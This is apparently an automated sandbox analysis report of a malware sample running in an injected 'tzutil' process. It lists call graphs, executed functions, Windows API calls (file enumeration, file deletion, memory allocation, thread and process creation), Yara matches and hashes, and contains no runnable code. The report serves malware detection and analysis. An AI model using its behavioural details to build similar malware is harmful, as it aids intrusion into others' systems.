102130->102124 102131 28c26d0 102132 28c2706 102131->102132 102133 28d8e30 LdrInitializeThunk 102131->102133 102136 28d9810 102132->102136 102133->102132 102135 28c271b 102137 28d989f 102136->102137 102138 28d983b 102136->102138 102141 31d2e80 LdrInitializeThunk 102137->102141 102138->102135 102139 28d98cd 102139->102135 102141->102139 102142 28cc9d0 102144 28cc9f9 102142->102144 102143 28ccafc 102144->102143 102145 28ccaa0 FindFirstFileW 102144->102145 102145->102143 102147 28ccabb 102145->102147 102146 28ccae3 FindNextFileW 102146->102147 102148 28ccaf5 FindClose 102146->102148 102147->102146 102148->102143 102149 28c5fd0 102150 28c8500 LdrInitializeThunk 102149->102150 102151 28c6000 102149->102151 102150->102151 102153 28c602c 102151->102153 102154 28c8480 102151->102154 102155 28c84c4 102154->102155 102156 28c84e5 102155->102156 102161 28d8b00 102155->102161 102156->102151 102158 28c84d5 102159 28c84f1 102158->102159 102160 28d9780 NtClose 102158->102160 102159->102151 102160->102156 102162 28d8b7d 102161->102162 102163 28d8b2b 102161->102163 102166 31d4650 LdrInitializeThunk 102162->102166 102163->102158 102164 28d8b9f 102164->102158 102166->102164 102167 28d1ed0 102168 28d1ee9 102167->102168 102169 28d1f31 102168->102169 102172 28d1f71 102168->102172 102174 28d1f76 102168->102174 102170 28db7f0 RtlFreeHeap 102169->102170 102171 28d1f41 102170->102171 102173 28db7f0 RtlFreeHeap 102172->102173 102173->102174 102185 28c3553 102186 28c8180 2 API calls 102185->102186 102187 28c3563 102186->102187 102188 28c357f 102187->102188 102189 28d9780 NtClose 102187->102189 102189->102188 102190 28c2ba5 102191 28c66d0 2 API calls 102190->102191 102192 28c2bd0 102191->102192 102193 28b9f20 102195 28b9f2f 102193->102195 102194 28b9f6d 102195->102194 102196 28b9f5a CreateThread 102195->102196 102197 28bb960 102198 28db760 NtAllocateVirtualMemory 102197->102198 102199 28bcfd1 102197->102199 102198->102199 102200 28c71a0 102201 28c71ca 102200->102201 102204 28c8330 102201->102204 102203 28c71f1 102205 28c834d 102204->102205 102211 28d8f10 102205->102211 102207 28c839d 102208 28c83a4 102207->102208 102216 28d8ff0 102207->102216 102208->102203 102210 28c83cd 102210->102203 102212 28d8fab 102211->102212 102213 28d8f3b 102211->102213 102221 31d2f30 LdrInitializeThunk 102212->102221 102213->102207 102214 28d8fe1 102214->102207 102217 28d90a1 102216->102217 102219 28d901f 102216->102219 102222 31d2d10 LdrInitializeThunk 102217->102222 102218 28d90e3 102218->102210 102219->102210 102221->102214 102222->102218 102223 28c11e0 102224 28c11fa 102223->102224 102225 28c4990 LdrLoadDll 102224->102225 102226 28c1215 102225->102226 102227 28c1249 PostThreadMessageW 102226->102227 102228 28c125a 102226->102228 102227->102228 102229 28c7720 102230 28c7738 102229->102230 102232 28c778f 102229->102232 102230->102232 102233 28cb660 102230->102233 102234 28cb686 102233->102234 102235 28cb8b3 102234->102235 102260 28d9b50 102234->102260 102235->102232 102237 28cb6f9 102237->102235 102238 28dc9c0 2 API calls 102237->102238 102239 28cb718 102238->102239 102239->102235 102240 28cb7ec 102239->102240 102241 28d8e30 LdrInitializeThunk 102239->102241 102243 28c5f50 LdrInitializeThunk 102240->102243 102245 28cb80b 102240->102245 102242 28cb77a 102241->102242 102242->102240 102244 28cb783 102242->102244 102243->102245 102244->102235 102246 28cb7d4 102244->102246 102247 28cb7b2 102244->102247 102263 28c5f50 102244->102263 102248 28cb89b 102245->102248 102266 28d89a0 102245->102266 102249 28c8500 LdrInitializeThunk 102246->102249 102281 28d4ae0 LdrInitializeThunk 102247->102281 102254 28c8500 LdrInitializeThunk 102248->102254 102253 28cb7e2 102249->102253 102253->102232 102256 28cb8a9 102254->102256 102255 28cb872 102271 28d8a50 102255->102271 102256->102232 102258 28cb88c 102276 28d8bb0 102258->102276 102261 28d9b6d 102260->102261 102262 28d9b7e CreateProcessInternalW 102261->102262 102262->102237 102264 28d8ff0 LdrInitializeThunk 102263->102264 102265 28c5f8b 102263->102265 102264->102265 102265->102247 102267 28d8a1d 102266->102267 102269 28d89cb 102266->102269 102282 31d39b0 LdrInitializeThunk 102267->102282 102268 28d8a3f 102268->102255 102269->102255 102272 28d8ad0 102271->102272 102274 28d8a7e 102271->102274 102283 31d4340 LdrInitializeThunk 102272->102283 102273 28d8af2 102273->102258 102274->102258 102277 28d8c30 102276->102277 102279 28d8bde 102276->102279 102284 31d2fb0 LdrInitializeThunk 102277->102284 102278 28d8c52 102278->102248 102279->102248 102281->102246 102282->102268 102283->102273 102284->102278 102285 28d8c60 102286 28d8cf2 102285->102286 102288 28d8c8e 102285->102288 102290 31d2ee0 LdrInitializeThunk 102286->102290 102287 28d8d20 102290->102287 102291 28d96e0 102292 28d970b 102291->102292 102293 28d9757 102291->102293 102294 28d976a NtDeleteFile 102293->102294 102296 28d8de0 102297 28d8dfa 102296->102297 102300 31d2df0 LdrInitializeThunk 102297->102300 102298 28d8e1f 102300->102298 102302 28dc8f0 102303 28db7f0 RtlFreeHeap 102302->102303 102304 28dc905 102303->102304

                                                                    Executed Functions

                                                                    Function 028B9F80 Relevance: 26.7, Strings: 21, Instructions: 431COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 26 28b9f80-28ba2c1 27 28ba2cb-28ba2d5 26->27 28 28ba321-28ba32b 27->28 29 28ba2d7-28ba2f6 27->29 32 28ba33c-28ba348 28->32 30 28ba308-28ba319 29->30 31 28ba2f8-28ba306 29->31 33 28ba31f 30->33 31->33 34 28ba34a-28ba354 32->34 35 28ba356 32->35 33->27 34->32 36 28ba35d-28ba364 35->36 38 28ba396-28ba3a0 36->38 39 28ba366-28ba394 36->39 40 28ba3b1-28ba3bd 38->40 39->36 41 28ba3bf-28ba3cb 40->41 42 28ba3cd-28ba3d7 40->42 41->40 44 28ba3e8-28ba3f4 42->44 45 28ba40b-28ba41c 44->45 46 28ba3f6-28ba409 44->46 48 28ba42d-28ba436 45->48 46->44 49 28ba438-28ba44a 48->49 50 28ba44c-28ba456 48->50 49->48 52 28ba467-28ba473 50->52 53 28ba48a-28ba48e 52->53 54 28ba475-28ba488 52->54 55 28ba490-28ba4b5 53->55 56 28ba4b7 53->56 54->52 55->53 58 28ba4be-28ba4c7 56->58 59 28ba4cd-28ba4d4 58->59 60 28ba5d0-28ba5da 58->60 61 28ba506-28ba509 59->61 62 28ba4d6-28ba504 59->62 63 28ba5eb-28ba5f7 60->63 64 28ba50f-28ba518 61->64 62->59 65 28ba5f9-28ba60c 63->65 66 28ba60e-28ba618 63->66 67 28ba51a-28ba532 64->67 68 28ba534-28ba543 64->68 65->63 70 28ba629-28ba635 66->70 67->64 71 28ba54a-28ba554 68->71 72 28ba545 68->72 73 28ba647-28ba64e 70->73 74 28ba637-28ba63d 70->74 75 28ba565-28ba571 71->75 72->60 78 28ba6f7-28ba6fb 73->78 79 28ba654 call 28db450 73->79 76 28ba63f-28ba642 74->76 77 28ba645 74->77 80 28ba573-28ba585 75->80 81 28ba587-28ba59b 75->81 76->77 77->70 83 28ba6fd-28ba71e 78->83 84 28ba73c-28ba746 78->84 88 28ba659-28ba663 79->88 80->75 90 28ba5ac-28ba5b5 81->90 86 28ba72c-28ba73a 83->86 87 28ba720-28ba729 83->87 89 28ba757-28ba760 84->89 86->78 87->86 92 28ba674-28ba67d 88->92 95 28ba762-28ba772 89->95 96 28ba774-28ba77e 89->96 93 28ba5cb 90->93 94 28ba5b7-28ba5c9 90->94 97 28ba67f-28ba68b 92->97 98 28ba68d-28ba694 92->98 93->58 94->90 95->89 100 28ba780-28ba79a 96->100 101 28ba7b6-28ba7ba 96->101 97->92 103 28ba6bd-28ba6c7 98->103 104 28ba696-28ba6a7 98->104 106 28ba79c-28ba7a0 100->106 107 28ba7a1-28ba7a3 100->107 108 28ba7bc-28ba7d3 101->108 109 28ba7d5-28ba7df 101->109 112 28ba6d8-28ba6e4 103->112 110 28ba6a9-28ba6ad 104->110 111 28ba6ae-28ba6b0 104->111 106->107 113 28ba7a5-28ba7ae 107->113 114 28ba7b4 107->114 108->101 115 28ba7f0-28ba7fa 109->115 110->111 118 28ba6bb 111->118 119 28ba6b2-28ba6b8 111->119 112->78 120 28ba6e6-28ba6f5 112->120 113->114 114->96 116 28ba7fc-28ba80f 115->116 117 28ba811-28ba81a 115->117 116->115 118->98 119->118 120->112
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                                    • API String ID: 0-3230942322
                                                                    • Opcode ID: 36614b9eb27887eba215152c997524aed3941c8cea6b7e39a2ee495c72944b75
                                                                    • Instruction ID: baa5347386a0f607f00b5ed8985f39a3238533d87205aef5ac7152017d3eb7cb
                                                                    • Opcode Fuzzy Hash: 36614b9eb27887eba215152c997524aed3941c8cea6b7e39a2ee495c72944b75
                                                                    • Instruction Fuzzy Hash: 31329DB8E0562CCBEB29CF54C8947DDBBB2BF45308F5081D9D04AAA381C7B55A89CF45
                                                                    Function 028CC9D0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 028CCAB1
                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 028CCAEE
                                                                    • FindClose.KERNELBASE(?), ref: 028CCAF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    • Opcode ID: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                                    • Instruction ID: 9a3aeb8c2efc74b8fef9f1c800b6f5f6d71d928411d728b4a3611777e02ec60f
                                                                    • Opcode Fuzzy Hash: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                                    • Instruction Fuzzy Hash: 353160BA9002487BDB20DB64CC89FEF777D9F44749F14455DB90CEA180DBB0AA858BA1
                                                                    Function 028D9480 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 028D957B
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                                    • Instruction ID: b4e49afea27fd11229bc5fbae441694f4ddf8e0b6d960ae868b5c10896071758
                                                                    • Opcode Fuzzy Hash: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                                    • Instruction Fuzzy Hash: 4031C2B9A01248AFCB54DF98D880EEEB7F9EF88304F108119F918A7340D770A955CFA5
                                                                    Function 028D95F0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 028D96D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                                    • Instruction ID: 9b38e027e797ea16f7c491a67e6c0809d9efcec3afab5ab3a3f523e3a59e91ad
                                                                    • Opcode Fuzzy Hash: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                                    • Instruction Fuzzy Hash: E031C7B9A00248AFCB14DF98D840EEFB7F9EF88714F108219F958A7340D674A911CFA5
                                                                    Function 028D98E0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(028C21AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,028D82FF,028C21AE), ref: 028D99A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                                    • Instruction ID: 0bf779b8b77657bc6c7e6d603958a5673e6dc99de38351a525468d11b6a38024
                                                                    • Opcode Fuzzy Hash: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                                    • Instruction Fuzzy Hash: 00211CB9A00248ABDB14DF98DC41FEFB7B9EF89704F108109F948AB340D774A9158FA5
                                                                    Function 028D96E0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteFile
                                                                    • String ID:
                                                                    • API String ID: 4033686569-0
                                                                    • Opcode ID: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                                    • Instruction ID: 6f144bf7abd136d9ad2b2fa06a230837a5610d2041440cbe47b75384327bf8ca
                                                                    • Opcode Fuzzy Hash: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                                    • Instruction Fuzzy Hash: 1611C2796013087AD760EB68CC45FEFB3ADDF85704F108009F94CAB240DB7079058BA6
                                                                    Function 028D9780 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 028D97B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                                    • Instruction ID: 83be303cfe9e453600a97292237ddf829cf0f50e8e334369a160ebfbcaeef9b9
                                                                    • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                                    • Instruction Fuzzy Hash: 25E0863A201604BBD110FA5DDC00F97B75DEFC6711F008015FA48A7240C671B9148BF1
                                                                    Function 031D4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b2f0c765446f32031cf88b1e0ed6beacc8b847b3b74046634a661f43da951c0b
                                                                    • Instruction ID: d6a00159de13e3c5da6c5974ccf79255e443c656af57428682e895e2da413453
                                                                    • Opcode Fuzzy Hash: b2f0c765446f32031cf88b1e0ed6beacc8b847b3b74046634a661f43da951c0b
                                                                    • Instruction Fuzzy Hash: 6D900431705C0413D144F15C4DC45474005D7F4701F55D011F0435554CCF15CF575371
                                                                    Function 031D4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 28dd05a2db7237ee6eed4d434289e1828886f7553815526a6b3d60100bbb5388
                                                                    • Instruction ID: 0c480668f04ac46e948b79e2841c17db9c45c9915bb762d709a74cd9af379c8f
                                                                    • Opcode Fuzzy Hash: 28dd05a2db7237ee6eed4d434289e1828886f7553815526a6b3d60100bbb5388
                                                                    • Instruction Fuzzy Hash: 2B900471701D04434144F15C4D044077005D7F57013D5D115F0555570CC71DCD55D37D
                                                                    Function 031D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 88f2c61cc71ce36b2d5cd86c5ea7d18a59ed9c67d9450edf7e51e189a77b1846
                                                                    • Instruction ID: 2b7920d0418d3bf954549324a161d02124e909a1b5d6c921bd4ee7f43d055fd0
                                                                    • Opcode Fuzzy Hash: 88f2c61cc71ce36b2d5cd86c5ea7d18a59ed9c67d9450edf7e51e189a77b1846
                                                                    • Instruction Fuzzy Hash: C6900261202804034109B1584514616400A87E4601B55D021E1015590DC72689916125
                                                                    Function 031D2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7a64bbe26419d7412c5c9b1bb3507967609a12ec44812c705ca1760b1cdfbff8
                                                                    • Instruction ID: 322650276d8a8504e30df95ccd9974720aaca6611f4a52a0181ac4a3a0c5ef76
                                                                    • Opcode Fuzzy Hash: 7a64bbe26419d7412c5c9b1bb3507967609a12ec44812c705ca1760b1cdfbff8
                                                                    • Instruction Fuzzy Hash: 5690023160580C03D154B1584514746000587D4701F55D011A0025654D87568B5576A1
                                                                    Function 031D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2dd1df815af5e678d9bc93fecfd2db77d95ce7da52ad7a49c7e5d2fea0314d85
                                                                    • Instruction ID: ff3153612c95c9bf7418793e8359072ccd65556e1483a6aa838921a4b5bac87d
                                                                    • Opcode Fuzzy Hash: 2dd1df815af5e678d9bc93fecfd2db77d95ce7da52ad7a49c7e5d2fea0314d85
                                                                    • Instruction Fuzzy Hash: AA90023120180C03D184B158450464A000587D5701F95D015A0026654DCB168B5977A1
                                                                    Function 031D2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 34d7b59cd2d075cc7a029632e3c78e6beb477400f147b1029f8c5f557b79d72e
                                                                    • Instruction ID: bdec1e244da58b3a3625e439212c3c975b356dd66d414e746c8ab3fb8236b27f
                                                                    • Opcode Fuzzy Hash: 34d7b59cd2d075cc7a029632e3c78e6beb477400f147b1029f8c5f557b79d72e
                                                                    • Instruction Fuzzy Hash: 8390023120584C43D144B1584504A46001587D4705F55D011A0065694D97268E55B661
                                                                    Function 031D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ce98c26bb034806eacbec305b06f686f12d1d4d503642377dbdc0e1f06c8bcd5
                                                                    • Instruction ID: a3bf62f55b6bd452146dfef60fcb90e7e840930dc897198424ae9051227b9188
                                                                    • Opcode Fuzzy Hash: ce98c26bb034806eacbec305b06f686f12d1d4d503642377dbdc0e1f06c8bcd5
                                                                    • Instruction Fuzzy Hash: 2B900435311C0403010DF55C07045070047C7DD751355D031F1017550CD733CD715131
                                                                    Function 031D2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: bcc652ef63fd5fb355f325c93965c827113f0df9b000a56a1c82fc1cb10cdc9f
                                                                    • Instruction ID: d0a0490889babb543d6a479968d5b6338d655e256c51e332fea0306a0e2488cd
                                                                    • Opcode Fuzzy Hash: bcc652ef63fd5fb355f325c93965c827113f0df9b000a56a1c82fc1cb10cdc9f
                                                                    • Instruction Fuzzy Hash: 11900225221804030149F558070450B044597DA751395D015F1417590CC72289655321
                                                                    Function 031D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ad6c8f3448c676b904baa4dc0feb353d3423d3e64e6dc431d0f121283e1f4475
                                                                    • Instruction ID: 4cbbe993c7a0077781106531c9a9897c4ea17a588e69793899a7717707800e0e
                                                                    • Opcode Fuzzy Hash: ad6c8f3448c676b904baa4dc0feb353d3423d3e64e6dc431d0f121283e1f4475
                                                                    • Instruction Fuzzy Hash: DD90026134180843D104B1584514B060005C7E5701F55D015E1065554D871ACD526126
                                                                    Function 031D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e831d71eff7b1468f8502effa1aa94c68b22333f68fdb7db7eb5f109efa11173
                                                                    • Instruction ID: 9ec5e9b26d7c2038dcf86520956d5f998cbb815199630204263ca2110021ff96
                                                                    • Opcode Fuzzy Hash: e831d71eff7b1468f8502effa1aa94c68b22333f68fdb7db7eb5f109efa11173
                                                                    • Instruction Fuzzy Hash: 42900221601804434144B16889449064005ABE5611755D121A0999550D875A89655665
